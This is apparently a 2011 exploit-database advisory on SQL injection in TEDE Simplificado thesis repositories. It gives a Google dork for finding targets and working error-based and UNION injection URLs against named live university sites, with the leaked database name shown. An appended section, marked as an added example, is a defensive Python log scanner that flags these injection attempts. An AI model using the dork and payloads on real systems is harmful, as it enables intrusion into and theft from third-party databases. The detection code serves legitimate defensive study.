
TEDE Simplificado SQL Injection

Posted on 01 June 2011

======================================================
TEDE Simplificado <= (Versions) SQL Injection Vulns
======================================================

>> Exploit database separated by exploit type (local, remote, DoS, etc.)

[+] Site           : 1337db.com
[+] Support e-mail : submit[at]1337db.com

############################################
I'm KnocKout 1337 Member from 1337 DataBase
############################################

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author         : KnocKout
[~] Contact        : knockoutr@msn.com
[~] HomePage       : http://h4x0resec.blogspot.com
[~] Reference      : http://h4x0resec.blogspot.com
[~] Special Thanks : Kalashinkov3 <= :)

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App.            : desenvolvido
|~Price               : N/A
|~Version             : N/A
|~Software            : http://www.ibict.br/
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir   : /
|~sqL                 : MysqL
|~Google DORK         : inurl:/tde_busca/ -- Good.:)
|[~]Date              : "26.11.2010"
|[~]Tested on         : Demo's Apache MySQL >=4.1 MySQL >=5
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

processaPesquisa.php
tde_fut.php
Files Not Sec.

http://Target/tde_busca/processaPesquisa.php?pesqExecutada={ID}&id={ID} SQL Inject!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================

For Version : v-IBICT -

http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663 {SQL}

http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1

MYSQL WRITES : Query failed (autor): Duplicate entry '~'TDE'~1' for key 1

Database Found : TGE

To be continue!

For Version : v1.01

http://etd.uns.edu.ar/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4

For Version : vS2.04

http://www.bdtd.ndc.uff.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=2951%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1

=============================================================

# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team'
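Every request in the advisory puts SQL text into the id parameter of processaPesquisa.php or tde_fut.php, where the legitimate examples (id=663, pesqExecutada=1) are plain integers. The following detection sketch is an added example, not code from the advisory or from the TEDE project: it scans web server access log lines for those two scripts and flags any request whose watched parameter is not a plain integer. It assumes a common/combined log format and integer-only parameters; the names WATCHED, suspicious_params and scan are hypothetical, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameters named in the advisory. Treating the parameters as
# integer-only is an assumption drawn from its legitimate-looking examples.
WATCHED = {
    "/tde_busca/processaPesquisa.php": ("pesqExecutada", "id"),
    "/tde_busca/tde_fut.php": ("id",),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_RE = re.compile(r"\d{1,10}")

def suspicious_params(request_target):
    """Return [(param, decoded_value)] for watched params that are not plain integers."""
    parts = urlsplit(request_target)
    params = WATCHED.get(parts.path)
    if params is None:
        return []
    # parse_qs percent-decodes values, so %20 and %28 cannot hide the SQL text.
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    for name in params:
        for value in query.get(name, []):
            if not NUMERIC_RE.fullmatch(value):
                hits.append((name, value))
    return hits

def scan(log_lines):
    """Return [(line_number, client_ip, param, value)] for each flagged request."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for name, value in suspicious_params(match.group(1)):
            findings.append((number, line.split(" ", 1)[0], name, value))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2011:10:00:00 +0000] "GET /tde_busca/processaPesquisa.php?pesqExecutada=1&id=663 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jun/2011:10:00:05 +0000] "GET /tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jun/2011:10:00:09 +0000] "GET /tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%201=1 HTTP/1.1" 200 911',
    '192.0.2.10 - - [01/Jun/2011:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the PHP scripts before the value reaches the query (or replaced by a bound parameter), closes the hole that this check only observes.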

 
